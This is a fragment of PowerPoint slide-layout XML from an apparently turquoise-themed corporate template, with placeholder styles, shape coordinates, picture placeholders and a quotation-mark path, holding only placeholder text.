              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="5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106769A-300A-C2EE-E0D8-9415368EBB7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357364" y="8035944"/>
            <a:ext cx="7330440" cy="923904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buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2000" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2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ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="ctr">
              <a:buFontTx/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64362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91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82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93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4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95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1" grpId="0" build="p" advAuto="0"/>
      <p:bldP spid="16" grpId="0"/>
      <p:bldP spid="19" grpId="0"/>
      <p:bldP spid="6" grpId="0" build="p"/>
      <p:bldP spid="7" grpId="0" build="p"/>
      <p:bldP spid="10" grpId="0" build="p" advAuto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s - icons turq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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A12C4E-DA69-FA37-FF05-4391289CADBC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1129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2A863C4-EE50-C944-62F5-23F9B7DF4C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95D6E87-A13D-F566-D62D-EB57A53FFE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681129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4D65F5C-279D-1C32-AB79-DE7A980F5F2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C24A49B-8A2A-01E4-1C90-B689E2623C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681129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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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620309B-D431-8C59-4EBC-F88AAD774DB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681129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55568-8BF1-6077-6CC0-55CE0032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rgbClr val="F4F5F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0047EC7F-2055-2B5D-763B-0E495C6C015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614186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375504B-3473-87CF-CD36-1DC25335C1F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948262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C7307972-992B-FB4F-8AC2-194E14BDA5E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0282338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DEAFCF0E-932D-33E3-7F0C-234D1E69AE0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4616414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070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Conclus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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{337823FA-7382-E7A0-B464-7BF6F4B2FF68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5549610" y="-9806916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66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0D6C3BD-981E-F375-8744-AA95B72BE3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19201" y="8531679"/>
            <a:ext cx="2598694" cy="51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337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95400" y="2006610"/>
            <a:ext cx="3901440" cy="1709040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5600" b="1">
                <a:latin typeface="+mj-lt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C2E4707-28EE-415F-AEF2-35D5BD556F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3160" y="2006609"/>
            <a:ext cx="10797540" cy="695324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10000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="6400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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Slide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  <a:p>
            <a:pPr lvl="2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7994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95400" y="2006610"/>
            <a:ext cx="15735300" cy="736588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5600" b="1">
                <a:latin typeface="+mj-lt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C2E4707-28EE-415F-AEF2-35D5BD556F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5400" y="3149602"/>
            <a:ext cx="15697200" cy="581024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10000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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Slide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  <a:p>
            <a:pPr lvl="2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41836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95400" y="2006610"/>
            <a:ext cx="9918700" cy="736588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5600" b="1">
                <a:latin typeface="+mj-lt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C2E4707-28EE-415F-AEF2-35D5BD556F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5400" y="3149602"/>
            <a:ext cx="9918700" cy="581024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10000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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Slide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  <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0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EC8CB6B-D5D5-70BF-252F-F84FFC03AA8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11934600" y="2006610"/>
            <a:ext cx="5096100" cy="6953236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="548640" tIns="548640" rIns="548640" bIns="54864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sk-SK" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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1BDB32E-D0B9-3173-AAA3-C1552E6161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934827" y="2006601"/>
            <a:ext cx="5095874" cy="6953250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" tIns="274320" rIns="274320" bIns="27432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68580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2pPr>
            <a:lvl3pPr marL="137160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3pPr>
            <a:lvl4pPr marL="205740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4pPr>
            <a:lvl5pPr marL="274320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9945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298DB24-9C43-7849-B461-B34BF51F75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95400" y="2006610"/>
            <a:ext cx="7200900" cy="736588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5600" b="1">
                <a:latin typeface="+mj-lt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23F7686-608C-F47F-BEF9-FFD1D0CD50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5400" y="3149602"/>
            <a:ext cx="7200900" cy="581024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10000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="8800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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Slide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  <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0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1C4F687-BDF7-A841-E908-37BCDFC952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44000" y="2006610"/>
            <a:ext cx="7848600" cy="6273788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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78DC08F-A3B0-D7BE-1345-6415D6F326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4000" y="8572501"/>
            <a:ext cx="7848600" cy="38735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000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3793811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li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57300" y="4643621"/>
            <a:ext cx="15773400" cy="99975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9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Some clever line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2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A090FA88-BF01-810D-43BB-D7E80B1E23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47489" y="8802019"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 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0DBF93A9-5D12-99FE-6C2E-B96F0555D61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476398" y="-3711500"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 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29C7C388-FF7B-57D1-142E-CFD17C828A3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34" y="4697876"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5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9461FB12-93C2-1783-CD23-EB696842C3B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29740" y="2179351"/>
            <a:ext cx="13591424" cy="191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38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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBCFDE1-9EA9-370B-CD67-2633265AA361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10348480" y="-600944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9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07" y="3245209"/>
            <a:ext cx="11850790" cy="379658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Two or three liner text.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2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5EBE246C-6FB8-4DD7-7FB3-765E1E30C6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17117" y="9357191"/>
            <a:ext cx="8272778" cy="3860834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 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F0C8EFCF-484D-2A0D-3EBB-74E13E99D97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72516" y="3690786"/>
            <a:ext cx="7834756" cy="7151244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5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FDC40740-A162-9ABB-171B-F91FD3F14F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34" y="4697876"/>
            <a:ext cx="13591424" cy="3409772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A5BAB821-79C0-7B6C-C5C5-1F5208027E6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0054" y="2393949"/>
            <a:ext cx="13591424" cy="191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44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57301" y="4643621"/>
            <a:ext cx="8640326" cy="9997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9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Zástupný objekt pre text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90DBFC37-4C60-2555-38F8-681F949C98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5400" y="5817160"/>
            <a:ext cx="10291356" cy="55758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>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="4000" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="75000"/>
                  </a:schemeClr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>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="6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Slide subtitle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360096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>
        <p:tmplLst>
          <p:tmpl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iterate type="lt">
                    <p:tmAbs val="3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57300" y="1327151"/>
            <a:ext cx="15773400" cy="99975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694124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DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main"/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Title Turquois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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CE7683-7790-AB1A-65E0-9560D3B1A624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10348480" y="-831112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9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57300" y="547691"/>
            <a:ext cx="15773400" cy="99975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5000" b="0" i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743759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rix icon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9ECF600E-3403-0F77-1C06-1AEC7095FF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>
            <a:outerShdw blurRad="12700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4309742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2A863C4-EE50-C944-62F5-23F9B7DF4C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4309742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4D65F5C-279D-1C32-AB79-DE7A980F5F2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4309742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1ECDAA4-7FBB-0A86-59CC-762B49D7AE0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4309742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55568-8BF1-6077-6CC0-55CE0032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rgbClr val="F4F5F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0047EC7F-2055-2B5D-763B-0E495C6C015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614186" y="2336335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375504B-3473-87CF-CD36-1DC25335C1F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948262" y="2336335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C7307972-992B-FB4F-8AC2-194E14BDA5E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0282338" y="2336335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DEAFCF0E-932D-33E3-7F0C-234D1E69AE0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4616414" y="2336335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C5B626ED-B8BF-6BB1-7330-608A3115D85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6300" y="8101265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B202124-8F60-B73F-A222-8A7ED50BE10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10376" y="8101265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473F829-A084-614A-8120-CFDA107B880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544452" y="8101265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6234390E-D8A8-1F96-E0EF-0937EBD914C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878528" y="8101265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78E704C2-B9EF-A90E-CF03-A860912265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614186" y="6127858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1" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{485B8A9C-1806-7F57-BE22-A6900A63EF8D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5948262" y="6127858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2" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCB7629-2DD9-C4AD-F097-2E37D8AF69A3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0282338" y="6127858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3" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96DD1752-407A-8B74-2C7A-D1DA14FB061B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4616414" y="6127858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024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163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Turquois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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5536B56-5C4A-21A2-AC19-F8A7BF75939A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-22583816" y="-2601856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9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303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L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-38100" y="9486901"/>
            <a:ext cx="18364200" cy="848678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="25000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="182880" bIns="91440" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Calibri Light" charset="0"/>
                <a:cs typeface="Calibri Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="4800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="4800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="4800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="4800"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full screen label</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29403709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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3293523-1D29-A86C-A3FC-F6DADAF2EE1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854032" y="-5031182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9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09FC16A5-B969-FA0E-A9E3-B6BC400A00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98435" y="1327150"/>
            <a:ext cx="11491134" cy="7040796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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7DF3464-4624-B551-0F45-54F6BA86BF1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98435" y="8584393"/>
            <a:ext cx="11491134" cy="38735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000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1513116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!!LIGHT-TURQ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43338B82-4C00-0AB3-AE4B-67624E3E98D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4264890" y="-16355954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9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09FC16A5-B969-FA0E-A9E3-B6BC400A00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013643" y="1327150"/>
            <a:ext cx="9978958" cy="7040796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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7DF3464-4624-B551-0F45-54F6BA86BF1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13643" y="8584393"/>
            <a:ext cx="9978958" cy="38735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000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842389B-6417-A906-6E85-4335046FAC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5401" y="3660273"/>
            <a:ext cx="4726022" cy="296645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l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685800" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr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Slide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  <a:p>
            <a:pPr lvl="2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31146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!!LINES2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5514A7F6-FF52-17BA-6F2F-C6E5879282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800000">
            <a:off x="4345805" y="1024514"/>
            <a:ext cx="31631358" cy="9439200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/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CE1D6BA-B458-E738-D798-BA6F4FEABFBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1327150"/>
            <a:ext cx="2598696" cy="1953584"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="948160" h="712785">
                <a:moveTo>
                  <a:pt x="796662" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="823981" y="0"/>
                  <a:pt x="847161" y="1656"/>
                  <a:pt x="866202" y="4968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="885243" y="8279"/>
                  <a:pt x="900765" y="14281"/>
                  <a:pt x="912769" y="22973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="924773" y="31666"/>
                  <a:pt x="933672" y="44498"/>
                  <a:pt x="939467" y="61469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="945262" y="78440"/>
                  <a:pt x="948160" y="100999"/>
                  <a:pt x="948160" y="129146"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="948160" y="160605"/>
                  <a:pt x="946711" y="189787"/>
                  <a:pt x="943814" y="216692"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="940916" y="243597"/>
                  <a:pt x="936156" y="268847"/>
                  <a:pt x="929533" y="292441"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="922910" y="316035"/>
                  <a:pt x="914218" y="339215"/>
                  <a:pt x="903456" y="361981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="892693" y="384747"/>
                  <a:pt x="879034" y="407720"/>
                  <a:pt x="862477" y="430900"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="703528" y="666839"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="697733" y="675117"/>
                  <a:pt x="691731" y="682154"/>
                  <a:pt x="685522" y="687949"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="679313" y="693744"/>
                  <a:pt x="671449" y="698504"/>
                  <a:pt x="661929" y="702230"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="652408" y="705955"/>
                  <a:pt x="641025" y="708645"/>
                  <a:pt x="627779" y="710301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="614534" y="711957"/>
                  <a:pt x="598391" y="712785"/>
                  <a:pt x="579350" y="712785"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="557826" y="712785"/>
                  <a:pt x="540441" y="711957"/>
                  <a:pt x="527195" y="710301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="513949" y="708645"/>
                  <a:pt x="504222" y="705541"/>
                  <a:pt x="498013" y="700988"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="491804" y="696435"/>
                  <a:pt x="488493" y="690847"/>
                  <a:pt x="488079" y="684224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="487665" y="677601"/>
                  <a:pt x="489113" y="669736"/>
                  <a:pt x="492425" y="660630"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="638955" y="321623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638955" y="129146"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="638955" y="100999"/>
                  <a:pt x="642060" y="78440"/>
                  <a:pt x="648269" y="61469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="654478" y="44498"/>
                  <a:pt x="663791" y="31666"/>
                  <a:pt x="676209" y="22973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="688627" y="14281"/>
                  <a:pt x="704977" y="8279"/>
                  <a:pt x="725260" y="4968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="745542" y="1656"/>
                  <a:pt x="769343" y="0"/>
                  <a:pt x="796662" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="309882" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="337202" y="0"/>
                  <a:pt x="360382" y="1656"/>
                  <a:pt x="379422" y="4968"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="398463" y="8279"/>
                  <a:pt x="413985" y="14281"/>
                  <a:pt x="425989" y="22973"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="437993" y="31666"/>
                  <a:pt x="446893" y="44498"/>
                  <a:pt x="452688" y="61469"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="458483" y="78440"/>
                  <a:pt x="461380" y="100999"/>
                  <a:pt x="461380" y="129146"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
